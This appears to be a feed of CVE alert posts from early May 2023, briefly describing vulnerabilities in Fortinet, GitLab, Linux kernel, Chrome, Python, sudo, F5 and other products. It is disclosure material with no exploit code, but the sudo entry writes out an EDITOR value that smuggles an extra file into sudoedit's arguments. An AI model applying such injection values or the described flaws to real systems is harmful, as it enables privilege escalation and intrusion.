🚨 CVE-2022-45858A use of a weak cryptographic algorithm vulnerability [CWE-327] in FortiNAC 9.4.1 and below, 9.2.6 and below, 9.1.0 all versions, 8.8.0 all versions, 8.7.0 all versions may increase the chances of an attacker to have access to sensitive information or to perform man-in-the-middle attacks.🎖@cveNotify |
|
| 2023-05-04 00:58:33 |
🚨 CVE-2022-45860A weak authentication vulnerability [CWE-1390] in FortiNAC-F version 7.2.0, FortiNAC version 9.4.2 and below, 9.2 all versions, 9.1 all versions, 8.8 all versions, 8.7 all versions in device registration page may allow an unauthenticated attacker to perform password spraying attacks with an increased chance of success.🎖@cveNotify |
|
| 2023-05-04 00:58:32 |
🚨 CVE-2022-4376An issue has been discovered in GitLab affecting all versions before 15.9.6, all versions starting from 15.10 before 15.10.5, all versions starting from 15.11 before 15.11.1. Under certain conditions, an attacker may be able to map a private email of a GitLab user to their GitLab account on an instance.🎖@cveNotify |
|
| 2023-05-04 00:58:28 |
🚨 CVE-2023-0805An issue has been discovered in GitLab EE affecting all versions starting from 15.2 before 15.9.6, all versions starting from 15.10 before 15.10.5, all versions starting from 15.11 before 15.11.1. A malicious group member may continue to have access to the public projects of a public group even after being banned from the public group by the owner.🎖@cveNotify |
|
| 2023-05-04 00:58:27 |
🚨 CVE-2023-22637An improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability [CWE-79] in FortiNAC-F version 7.2.0, FortiNAC version 9.4.2 and below, 9.2 all versions, 9.1 all versions, 8.8 all versions, 8.7 all versions in License Management would permit an authenticated attacker to trigger remote code execution via crafted licenses.🎖@cveNotify |
|
| 2023-05-04 00:58:26 |
🚨 CVE-2023-22640A out-of-bounds write in Fortinet FortiOS version 7.2.0 through 7.2.3, FortiOS version 7.0.0 through 7.0.10, FortiOS version 6.4.0 through 6.4.11, FortiOS version 6.2.0 through 6.2.13, FortiOS all versions 6.0, FortiProxy version 7.2.0 through 7.2.1, FortiProxy version 7.0.0 through 7.0.7, FortiProxy all versions 2.0, FortiProxy all versions 1.2, FortiProxy all versions 1.1, FortiProxy all versions 1.0 allows an authenticated attacker to execute unauthorized code or commands via specifically crafted requests.🎖@cveNotify |
|
| 2023-05-04 00:58:22 |
🚨 CVE-2023-27993A relative path traversal [CWE-23] in Fortinet FortiADC version 7.2.0 and before 7.1.1 allows a privileged attacker to delete arbitrary directories from the underlying file system via crafted CLI commands.🎖@cveNotify |
|
| 2023-05-04 00:58:21 |
🚨 CVE-2023-2182An issue has been discovered in GitLab EE affecting all versions starting from 15.10 before 15.10.5, all versions starting from 15.11 before 15.11.1. Under certain conditions when OpenID Connect is enabled on an instance, it may allow users who are marked as 'external' to become 'regular' users thus leading to privilege escalation for those users.🎖@cveNotify |
|
| 2023-05-04 00:58:20 |
🚨 CVE-2022-43950A URL redirection to untrusted site ('Open Redirect') vulnerability [CWE-601] in FortiNAC-F version 7.2.0, FortiNAC version 9.4.1 and below, 9.2 all versions, 9.1 all versions, 8.8 all versions, 8.7 all versions may allow an unauthenticated attacker to redirect users to any arbitrary website via a crafted URL.🎖@cveNotify |
|
| 2023-05-03 23:58:39 |
🚨 CVE-2023-1965An issue has been discovered in GitLab EE affecting all versions starting from 14.2 before 15.9.6, all versions starting from 15.10 before 15.10.5, all versions starting from 15.11 before 15.11.1. Lack of verification on RelayState parameter allowed a maliciously crafted URL to obtain access tokens granted for 3rd party Group SAML SSO logins. This feature isn't enabled by default.🎖@cveNotify |
|
| 2023-05-03 23:58:38 |
🚨 CVE-2023-30204Judging Management System v1.0 was discovered to contain a SQL injection vulnerability via the judge_id parameter at /php-jms/edit_judge.php.🎖@cveNotify |
|
| 2023-05-03 23:58:37 |
🚨 CVE-2023-31484CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.🎖@cveNotify |
|
| 2023-05-03 23:58:33 |
🚨 CVE-2023-31486HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.🎖@cveNotify |
|
| 2023-05-03 23:58:32 |
🚨 CVE-2023-28205A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2023-05-03 23:58:31 |
🚨 CVE-2023-26286IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX runtime services library to execute arbitrary commands. IBM X-Force ID: 248421.🎖@cveNotify |
|
| 2023-05-03 23:58:27 |
🚨 CVE-2023-28484In libxml2 before 2.10.4, parsing of certain invalid XSD schemas can lead to a NULL pointer dereference and subsequently a segfault. This occurs in xmlSchemaFixupComplexType in xmlschemas.c.🎖@cveNotify |
|
| 2023-05-03 23:58:26 |
🚨 CVE-2022-29606An issue was discovered in ONOS 2.5.1. An intent with a large port number shows the CORRUPT state, which is misleading to a network operator. Improper handling of such port numbers causes inconsistency between intent and flow rules in the network.🎖@cveNotify |
|
| 2023-05-03 23:58:25 |
🚨 CVE-2020-22429redox-os v0.1.0 was discovered to contain a use-after-free bug via the gethostbyaddr() function at /src/header/netdb/mod.rs.🎖@cveNotify |
|
| 2023-05-03 23:58:21 |
🚨 CVE-2023-24744Cross Site Scripting (XSS) vulnerability in Rediker Software AdminPlus 6.1.91.00 allows remote attackers to run arbitrary code via the onload function within the application DOM.🎖@cveNotify |
|
| 2023-05-03 23:58:20 |
🚨 CVE-2023-2258Improper Neutralization of Formula Elements in a CSV File in GitHub repository alfio-event/alf.io prior to 2.0-M4-2304.🎖@cveNotify |
|
| 2023-05-03 23:58:19 |
🚨 CVE-2023-2259Improper Neutralization of Special Elements Used in a Template Engine in GitHub repository alfio-event/alf.io prior to 2.0-M4-2304.🎖@cveNotify |
|
| 2023-05-03 20:58:25 |
🚨 CVE-2023-1414The WP VR WordPress plugin before 8.3.0 does not have authorisation and CSRF checks in various AJAX actions, one in particular could allow any authenticated users, such as subscriber to update arbitrary tours🎖@cveNotify |
|
| 2023-05-03 20:58:24 |
🚨 CVE-2023-26494lorawan-stack is an open source LoRaWAN network server. Prior to version 3.24.1, an open redirect exists on the login page of the lorawan stack server, allowing an attacker to supply a user controlled redirect upon sign in. This issue may allows malicious actors to phish users, as users assume they were redirected to the homepage on login. Version 3.24.1 contains a fix.🎖@cveNotify |
|
| 2023-05-03 20:58:23 |
🚨 CVE-2023-30544Kiwi TCMS is an open source test management system. In versions of Kiwi TCMS prior to 12.2, users were able to update their email addresses via the `My profile` admin page. This page allowed them to change the email address registered with their account without the ownership verification performed during account registration. Operators of Kiwi TCMS should upgrade to v12.2 or later to receive a patch. No known workarounds exist.🎖@cveNotify |
|
| 2023-05-03 20:58:22 |
🚨 CVE-2023-27849rails-routes-to-json v1.0.0 was discovered to contain a remote code execution (RCE) vulnerability via the child_process function.🎖@cveNotify |
|
| 2023-05-03 20:58:21 |
🚨 CVE-2023-24823RIOT-OS, an operating system that supports Internet of Things devices, contains a network stack with the ability to process 6LoWPAN frames. Prior to version 2022.10, an attacker can send a crafted frame to the device resulting in a type confusion between IPv6 extension headers and a UDP header. This occurs while encoding a 6LoWPAN IPHC header. The type confusion manifests in an out of bounds write in the packet buffer. The overflow can be used to corrupt other packets and the allocator metadata. Corrupting a pointer will easily lead to denial of service. While carefully manipulating the allocator metadata gives an attacker the possibility to write data to arbitrary locations and thus execute arbitrary code. Version 2022.10 fixes this issue. As a workaround, apply the patches manually.🎖@cveNotify |
|
| 2023-05-03 20:58:17 |
🚨 CVE-2023-24822RIOT-OS, an operating system that supports Internet of Things devices, contains a network stack with the ability to process 6LoWPAN frames. Prior to version 2022.10, an attacker can send a crafted frame to the device resulting in a NULL pointer dereference while encoding a 6LoWPAN IPHC header. The NULL pointer dereference causes a hard fault exception, leading to denial of service. Version 2022.10 fixes this issue. As a workaround, apply the patches manually.🎖@cveNotify |
|
| 2023-05-03 20:58:16 |
🚨 CVE-2023-24821RIOT-OS, an operating system that supports Internet of Things devices, contains a network stack with the ability to process 6LoWPAN frames. Prior to version 2022.10, an attacker can send a crafted frame to the device resulting in a large out of bounds write beyond the packet buffer. The write will create a hard fault exception after reaching the last page of RAM. The hard fault is not handled and the system will be stuck until reset, thus the impact is denial of service. Version 2022.10 fixes this issue. As a workaround, disable support for fragmented IP datagrams or apply the patches manually.🎖@cveNotify |
|
| 2023-05-03 20:58:15 |
🚨 CVE-2023-2417A vulnerability was found in ks-soft Advanced Host Monitor up to 12.56 and classified as problematic. Affected by this issue is some unknown functionality of the file C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe. The manipulation leads to unquoted search path. It is possible to launch the attack on the local host. Upgrading to version 12.60 is able to address this issue. It is recommended to upgrade the affected component. VDB-227714 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-03 20:58:14 |
🚨 CVE-2022-29608An issue was discovered in ONOS 2.5.1. An intent with a port that is an intermediate point of its path installs an invalid flow rule, causing a network loop.🎖@cveNotify |
|
| 2023-05-03 17:58:39 |
🚨 CVE-2023-24461An improper certificate validation vulnerability exists in the BIG-IP Edge Client for Windows and macOS and may allow an attacker to impersonate a BIG-IP APM system. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-05-03 17:58:38 |
🚨 CVE-2023-24594When an SSL profile is configured on a Virtual Server, undisclosed traffic can cause an increase in CPU or SSL accelerator resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-05-03 17:58:36 |
🚨 CVE-2023-27378Multiple reflected cross-site scripting (XSS) vulnerabilities exist in undisclosed pages of the BIG-IP Configuration utility which allow an attacker to run JavaScript in the context of the currently logged-in user. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-05-03 17:58:35 |
🚨 CVE-2023-28406A directory traversal vulnerability exists in an undisclosed page of the BIG-IP Configuration utility which may allow an authenticated attacker to read files with .xml extension. Access to restricted information is limited and the attacker does not control what information is obtained. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-05-03 17:58:34 |
🚨 CVE-2023-28656NGINX Management Suite may allow an authenticated attacker to gain access to configuration objects outside of their assigned environment. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-05-03 17:58:33 |
🚨 CVE-2023-28724NGINX Management Suite default file permissions are set such that an authenticated attacker may be able to modify sensitive files on NGINX Instance Manager and NGINX API Connectivity Manager. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-05-03 17:58:32 |
🚨 CVE-2023-28742When DNS is provisioned, an authenticated remote command execution vulnerability exists in DNS iQuery mesh. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-05-03 17:58:31 |
🚨 CVE-2023-29163When UDP profile with idle timeout set to immediate or the value 0 is configured on a virtual server, undisclosed traffic can cause TMM to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-05-03 17:58:29 |
🚨 CVE-2023-29240An authenticated attacker granted a Viewer or Auditor role on a BIG-IQ can upload arbitrary files using an undisclosed iControl REST endpoint. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-05-03 17:58:28 |
🚨 CVE-2023-2231A vulnerability, which was classified as critical, was found in MAXTECH MAX-G866ac 0.4.1_TBRO_20160314. This affects an unknown part of the component Remote Management. The manipulation leads to missing authentication. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227001 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-03 17:58:27 |
🚨 CVE-2023-29906H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the Edit_BasicSSID interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-05-03 17:58:26 |
🚨 CVE-2023-29905H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the UpdateSnat interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-05-03 17:58:25 |
🚨 CVE-2023-1998The Linux kernel allows userspace processes to enable mitigations by calling prctl with PR_SET_SPECULATION_CTRL which disables the speculation feature as well as by using seccomp. We had noticed that on VMs of at least one major cloud provider, the kernel still left the victim process exposed to attacks in some cases even after enabling the spectre-BTI mitigation with prctl. The same behavior can be observed on a bare-metal machine when forcing the mitigation to IBRS on boot command line.This happened because when plain IBRS was enabled (not enhanced IBRS), the kernel had some logic that determined that STIBP was not needed. The IBRS bit implicitly protects against cross-thread branch target injection. However, with legacy IBRS, the IBRS bit was cleared on returning to userspace, due to performance reasons, which disabled the implicit STIBP and left userspace threads vulnerable to cross-thread branch target injection against which STIBP protects.🎖@cveNotify |
|
| 2023-05-03 17:58:24 |
🚨 CVE-2023-27991The post-authentication command injection vulnerability in the CLI command of Zyxel ATP series firmware versions 4.32 through 5.35, USG FLEX series firmware versions 4.50 through 5.35, USG FLEX 50(W) firmware versions 4.16 through 5.35, USG20(W)-VPN firmware versions 4.16 through 5.35, and VPN series firmware versions 4.30 through 5.35, which could allow an authenticated attacker to execute some OS commands remotely.🎖@cveNotify |
|
| 2023-05-03 17:58:23 |
🚨 CVE-2023-27990The XSS vulnerability in Zyxel ATP series firmware versions 4.32 through 5.35, USG FLEX series firmware versions 4.50 through 5.35, USG FLEX 50(W) firmware versions 4.16 through 5.35, USG20(W)-VPN firmware versions 4.16 through 5.35, and VPN series firmware versions 4.30 through 5.35, which could allow an authenticated attacker with administrator privileges to store malicious scripts in a vulnerable device. A successful XSS attack could then result in the stored malicious scripts being executed when the user visits the Logs page of the GUI on the device.🎖@cveNotify |
|
| 2023-05-03 17:58:21 |
🚨 CVE-2023-26865SQL injection vulnerability found in PrestaShop bdroppy v.2.2.12 and before allowing a remote attacker to gain privileges via the BdroppyCronModuleFrontController::importProducts component.🎖@cveNotify |
|
| 2023-05-03 17:58:20 |
🚨 CVE-2022-48150Shopware v5.5.10 was discovered to contain a cross-site scripting (XSS) vulnerability via the recovery/install/ URI.🎖@cveNotify |
|
| 2023-05-03 17:58:19 |
🚨 CVE-2023-2228Cross-Site Request Forgery (CSRF) in GitHub repository modoboa/modoboa prior to 2.1.0.🎖@cveNotify |
|
| 2023-05-03 17:58:18 |
🚨 CVE-2023-2227Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.🎖@cveNotify |
|
| 2023-05-03 14:59:23 |
🚨 CVE-2023-21719Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability.🎖@cveNotify |
|
| 2023-05-03 14:59:22 |
🚨 CVE-2023-21775Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-05-03 14:59:21 |
🚨 CVE-2023-21795Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-05-03 14:59:20 |
🚨 CVE-2023-21796Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-05-03 14:59:19 |
🚨 CVE-2022-38725An integer overflow in the RFC3164 parser in One Identity syslog-ng 3.0 through 3.37 allows remote attackers to cause a Denial of Service via crafted syslog input that is mishandled by the tcp or network function. syslog-ng Premium Edition 7.0.30 and syslog-ng Store Box 6.10.0 are also affected.🎖@cveNotify |
|
| 2023-05-03 14:59:18 |
🚨 CVE-2022-47024A null pointer dereference issue was discovered in function gui_x11_create_blank_mouse in gui_x11.c in vim 8.1.2269 thru 9.0.0339 allows attackers to cause denial of service or other unspecified impacts.🎖@cveNotify |
|
| 2023-05-03 14:59:17 |
🚨 CVE-2023-22809In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value.🎖@cveNotify |
|
| 2023-05-03 14:59:16 |
🚨 CVE-2023-23589The SafeSocks option in Tor before 0.4.7.13 has a logic error in which the unsafe SOCKS4 protocol can be used but not the safe SOCKS4a protocol, aka TROVE-2022-002.🎖@cveNotify |
|
| 2023-05-03 14:59:15 |
🚨 CVE-2022-4743A potential memory leak issue was discovered in SDL2 in GLES_CreateTexture() function in SDL_render_gles.c. The vulnerability allows an attacker to cause a denial of service attack. The vulnerability affects SDL2 v2.0.4 and above. SDL-1.x are not affected.🎖@cveNotify |
|
| 2023-05-03 14:59:14 |
🚨 CVE-2023-0131Inappropriate implementation in in iframe Sandbox in Google Chrome prior to 109.0.5414.74 allowed a remote attacker to bypass file download restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-03 14:59:13 |
🚨 CVE-2023-0133Inappropriate implementation in in Permission prompts in Google Chrome on Android prior to 109.0.5414.74 allowed a remote attacker to bypass main origin permission delegation via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-03 14:59:12 |
🚨 CVE-2023-0134Use after free in Cart in Google Chrome prior to 109.0.5414.74 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via database corruption and a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-03 14:59:11 |
🚨 CVE-2023-0135Use after free in Cart in Google Chrome prior to 109.0.5414.74 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via database corruption and a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-03 14:59:10 |
🚨 CVE-2023-0128Use after free in Overview Mode in Google Chrome on Chrome OS prior to 109.0.5414.74 allowed a remote attacker who convinced a user to engage in specific UI interactions to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-05-03 12:58:35 |
🚨 CVE-2022-45061An issue was discovered in Python before 3.11.1. An unnecessary quadratic algorithm exists in one path when processing some inputs to the IDNA (RFC 3490) decoder, such that a crafted, unreasonably long name being presented to the decoder could lead to a CPU denial of service. Hostnames are often supplied by remote servers that could be controlled by a malicious actor; in such a scenario, they could trigger excessive CPU consumption on the client attempting to make use of an attacker-supplied supposed hostname. For example, the attack payload could be placed in the Location header of an HTTP response with status code 302. A fix is planned in 3.11.1, 3.10.9, 3.9.16, 3.8.16, and 3.7.16.🎖@cveNotify |
|
| 2023-05-03 12:58:34 |
🚨 CVE-2022-45062In Xfce xfce4-settings before 4.16.4 and 4.17.x before 4.17.1, there is an argument injection vulnerability in xfce4-mime-helper.🎖@cveNotify |
|
| 2023-05-03 12:58:33 |
🚨 CVE-2022-42919Python 3.9.x before 3.9.16 and 3.10.x before 3.10.9 on Linux allows local privilege escalation in a non-default configuration. The Python multiprocessing library, when used with the forkserver start method on Linux, allows pickles to be deserialized from any user in the same machine local network namespace, which in many system configurations means any user on the same machine. Pickles can execute arbitrary code. Thus, this allows for local user privilege escalation to the user that any forkserver process is running as. Setting multiprocessing.util.abstract_sockets_supported to False is a workaround. The forkserver start method for multiprocessing is not the default start method. This issue is Linux specific because only Linux supports abstract namespace sockets. CPython before 3.9 does not make use of Linux abstract namespace sockets by default. Support for users manually specifying an abstract namespace socket was added as a bugfix in 3.7.8 and 3.8.3, but users would need to make specific uncommon API calls in order to do that in CPython before 3.9.🎖@cveNotify |
|
| 2023-05-03 12:58:32 |
🚨 CVE-2022-37454The Keccak XKCP SHA-3 reference implementation before fdc6fef has an integer overflow and resultant buffer overflow that allows attackers to execute arbitrary code or eliminate expected cryptographic properties. This occurs in the sponge function interface.🎖@cveNotify |
|
| 2023-05-03 12:58:28 |
🚨 CVE-2021-28861** DISPUTED ** Python 3.x through 3.10 has an open redirection vulnerability in lib/http/server.py due to no protection against multiple (/) at the beginning of URI path which may leads to information disclosure. NOTE: this is disputed by a third party because the http.server.html documentation page states "Warning: http.server is not recommended for production. It only implements basic security checks."🎖@cveNotify |
|
| 2023-05-03 12:58:27 |
🚨 CVE-2022-31212An issue was discovered in dbus-broker before 31. It depends on c-uitl/c-shquote to parse the DBus service's Exec line. c-shquote contains a stack-based buffer over-read if a malicious Exec line is supplied.🎖@cveNotify |
|
| 2023-05-03 12:58:26 |
🚨 CVE-2022-31213An issue was discovered in dbus-broker before 31. Multiple NULL pointer dereferences can be found when supplying a malformed XML config file.🎖@cveNotify |
|
| 2023-05-03 12:58:25 |
🚨 CVE-2015-20107In Python (aka CPython) up to 3.10.8, the mailcap module does not add escape characters into commands discovered in the system mailcap file. This may allow attackers to inject shell commands into applications that call mailcap.findmatch with untrusted input (if they lack validation of user-provided filenames or arguments). The fix is also back-ported to 3.7, 3.8, 3.9🎖@cveNotify |
|
| 2023-05-03 12:58:24 |
🚨 CVE-2021-3654A vulnerability was found in openstack-nova's console proxy, noVNC. By crafting a malicious URL, noVNC could be made to redirect to any desired URL.🎖@cveNotify |
|
| 2023-05-03 05:59:52 |
🚨 CVE-2023-1829A use-after-free vulnerability in the Linux Kernel traffic control index filter (tcindex) can be exploited to achieve local privilege escalation. The tcindex_delete function which does not properly deactivate filters in case of a perfect hashes while deleting the underlying structure which can later lead to double freeing the structure. A local attacker user can use this vulnerability to elevate its privileges to root.We recommend upgrading past commit 8c710f75256bb3cf05ac7b1672c82b92c43f3d28.🎖@cveNotify |
|
| 2023-05-03 05:59:51 |
🚨 CVE-2023-1989A use-after-free flaw was found in btsdio_remove in drivers\bluetooth\btsdio.c in the Linux Kernel. In this flaw, a call to btsdio_remove with an unfinished job, may cause a race problem leading to a UAF on hdev devices.🎖@cveNotify |
|
| 2023-05-03 05:59:50 |
🚨 CVE-2023-30456An issue was discovered in arch/x86/kvm/vmx/nested.c in the Linux kernel before 6.2.8. nVMX on x86_64 lacks consistency checks for CR0 and CR4.🎖@cveNotify |
|
| 2023-05-03 05:59:49 |
🚨 CVE-2023-1855A use-after-free flaw was found in xgene_hwmon_remove in drivers/hwmon/xgene-hwmon.c in the Hardware Monitoring Linux Kernel Driver (xgene-hwmon). This flaw could allow a local attacker to crash the system due to a race problem. This vulnerability could even lead to a kernel information leak problem.🎖@cveNotify |
|
| 2023-05-03 05:59:47 |
🚨 CVE-2023-1611A use-after-free flaw was found in btrfs_search_slot in fs/btrfs/ctree.c in btrfs in the Linux Kernel.This flaw allows an attacker to crash the system and possibly cause a kernel information lea🎖@cveNotify |
|
| 2023-05-03 05:59:46 |
🚨 CVE-2023-1670A flaw use after free in the Linux kernel Xircom 16-bit PCMCIA (PC-card) Ethernet driver was found.A local user could use this flaw to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-05-03 05:59:45 |
🚨 CVE-2023-1074A memory leak flaw was found in the Linux kernel's Stream Control Transmission Protocol. This issue may occur when a user starts a malicious networking service and someone connects to this service. This could allow a local user to starve resources, causing a denial of service.🎖@cveNotify |
|
| 2023-05-03 05:59:44 |
🚨 CVE-2023-1076A flaw was found in the Linux Kernel. The tun/tap sockets have their socket UID hardcoded to 0 due to a type confusion in their initialization function. While it will be often correct, as tuntap devices require CAP_NET_ADMIN, it may not always be the case, e.g., a non-root user only having that capability. This would make tun/tap sockets being incorrectly treated in filtering/routing decisions, possibly bypassing network filters.🎖@cveNotify |
|
| 2023-05-03 05:59:43 |
🚨 CVE-2023-1077In the Linux kernel, pick_next_rt_entity() may return a type confused entry, not detected by the BUG_ON condition, as the confused entry will not be NULL, but list_head.The buggy error condition would lead to a type confused entry with the list head,which would then be used as a type confused sched_rt_entity,causing memory corruption.🎖@cveNotify |
|
| 2023-05-03 05:59:42 |
🚨 CVE-2023-1079A flaw was found in the Linux kernel. A use-after-free may be triggered in asus_kbd_backlight_set when plugging/disconnecting in a malicious USB device, which advertises itself as an Asus device. Similarly to the previous known CVE-2023-25012, but in asus devices, the work_struct may be scheduled by the LED controller while the device is disconnecting, triggering a use-after-free on the struct asus_kbd_leds *led structure. A malicious USB device may exploit the issue to cause memory corruption with controlled data.🎖@cveNotify |
|
| 2023-05-03 05:59:41 |
🚨 CVE-2023-1073A memory corruption flaw was found in the Linux kernel’s human interface device (HID) subsystem in how a user inserts a malicious USB device. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-05-03 05:59:40 |
🚨 CVE-2023-1078A flaw was found in the Linux Kernel in RDS (Reliable Datagram Sockets) protocol. The rds_rm_zerocopy_callback() uses list_entry() on the head of a list causing a type confusion. Local user can trigger this with rds_message_put(). Type confusion leads to `struct rds_msg_zcopy_info *info` actually points to something else that is potentially controlled by local user. It is known how to trigger this, which causes an out of bounds access, and a lock corruption.🎖@cveNotify |
|
| 2023-05-03 05:59:39 |
🚨 CVE-2023-1513A flaw was found in KVM. When calling the KVM_GET_DEBUGREGS ioctl, on 32-bit systems, there might be some uninitialized portions of the kvm_debugregs structure that could be copied to userspace, causing an information leak.🎖@cveNotify |
|
| 2023-05-03 05:59:37 |
🚨 CVE-2023-1281Use After Free vulnerability in Linux kernel traffic control index filter (tcindex) allows Privilege Escalation. The imperfect hash area can be updated while packets are traversing, which will cause a use-after-free when 'tcf_exts_exec()' is called with the destroyed tcf_ext. A local attacker user can use this vulnerability to elevate its privileges to root.This issue affects Linux Kernel: from 4.14 before git commit ee059170b1f7e94e55fa6cadee544e176a6e59c2.🎖@cveNotify |
|
| 2023-05-03 05:59:36 |
🚨 CVE-2023-28466do_tls_getsockopt in net/tls/tls_main.c in the Linux kernel through 6.2.6 lacks a lock_sock call, leading to a race condition (with a resultant use-after-free or NULL pointer dereference).🎖@cveNotify |
|
| 2023-05-03 05:59:35 |
🚨 CVE-2022-3424A use-after-free flaw was found in the Linux kernel’s SGI GRU driver in the way the first gru_file_unlocked_ioctl function is called by the user, where a fail pass occurs in the gru_check_chiplet_assignment function. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-05-03 05:59:34 |
🚨 CVE-2022-3707A double-free memory flaw was found in the Linux kernel. The Intel GVT-g graphics driver triggers VGA card system resource overload, causing a fail in the intel_gvt_dma_map_guest_page function. This issue could allow a local user to crash the system.🎖@cveNotify |
|
| 2023-05-03 05:59:33 |
🚨 CVE-2023-1118A flaw use after free in the Linux kernel integrated infrared receiver/transceiver driver was found in the way user detaching rc device. A local user could use this flaw to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-05-03 05:59:32 |
🚨 CVE-2023-23004In the Linux kernel before 5.19, drivers/gpu/drm/arm/malidp_planes.c misinterprets the get_sg_table return value (expects it to be NULL in the error case, whereas it is actually an error pointer).🎖@cveNotify |
|
| 2023-05-03 05:59:31 |
🚨 CVE-2023-22998In the Linux kernel before 6.0.3, drivers/gpu/drm/virtio/virtgpu_object.c misinterprets the drm_gem_shmem_get_sg_table return value (expects it to be NULL in the error case, whereas it is actually an error pointer).🎖@cveNotify |
|
| 2023-05-02 21:58:41 |
🚨 CVE-2022-48477In JetBrains Hub before 2023.1.15725 SSRF protection in Auth Module integration was missing🎖@cveNotify |
|
| 2023-05-02 21:58:40 |
🚨 CVE-2022-48476In JetBrains Ktor before 2.3.0 path traversal in the `resolveResource` method was possible🎖@cveNotify |
|
| 2023-05-02 21:58:39 |
🚨 CVE-2023-22581White Rabbit Switch contains a vulnerability which makes it possible for an attacker to perform system commands under the context of the web application (the default installation makes the webserver run as the root user).🎖@cveNotify |
|
| 2023-05-02 21:58:38 |
🚨 CVE-2023-22577Within White Rabbit Switch it's possible as an unauthenticated user to retrieve sensitive information such as password hashes and the SNMP community strings.🎖@cveNotify |
|
| 2023-05-02 21:58:33 |
🚨 CVE-2023-28982A Missing Release of Memory after Effective Lifetime vulnerability in the routing protocol daemon of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network based attacker to cause a Denial of Service (DoS). In a BGP rib sharding scenario, when an attribute of an active BGP route is updated memory will leak. As rpd memory usage increases over time the rpd process will eventually run out of memory, crash, and restart. The memory utilization can be monitored with the following CLI commands: show task memory show system processes extensive | match rpd This issue affects: Juniper Networks Junos OS 20.3 versions prior to 20.3R3-S2; 20.4 versions prior to 20.4R3-S6; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R2. Juniper Networks Junos OS Evolved 20.3-EVO version 20.3R1-EVO and later versions; 20.4-EVO versions prior to 20.4R3-S6-EVO; 21.2-EVO versions prior to 21.2R3-EVO; 21.3-EVO versions prior to 21.3R2-EVO.🎖@cveNotify |
|
| 2023-05-02 21:58:32 |
🚨 CVE-2023-31045** DISPUTED ** A stored Cross-site scripting (XSS) issue in Text Editors and Formats in Backdrop CMS before 1.24.2 allows remote attackers to inject arbitrary web script or HTML via the name parameter. When a user is editing any content type (e.g., page, post, or card) as an admin, the stored XSS payload is executed upon selecting a malicious text formatting option. NOTE: the vendor disputes the security relevance of this finding because "any administrator that can configure a text format could easily allow Full HTML anywhere."🎖@cveNotify |
|
| 2023-05-02 21:58:31 |
🚨 CVE-2023-30533SheetJS Community Edition before 0.19.3 allows Prototype Pollution via a crafted file.🎖@cveNotify |
|
| 2023-05-02 21:58:30 |
🚨 CVE-2023-31083An issue was discovered in drivers/bluetooth/hci_ldisc.c in the Linux kernel 6.2. In hci_uart_tty_ioctl, there is a race condition between HCIUARTSETPROTO and HCIUARTGETPROTO. HCI_UART_PROTO_SET is set before hu->proto is set. A NULL pointer dereference may occur.🎖@cveNotify |
|
| 2023-05-02 21:58:26 |
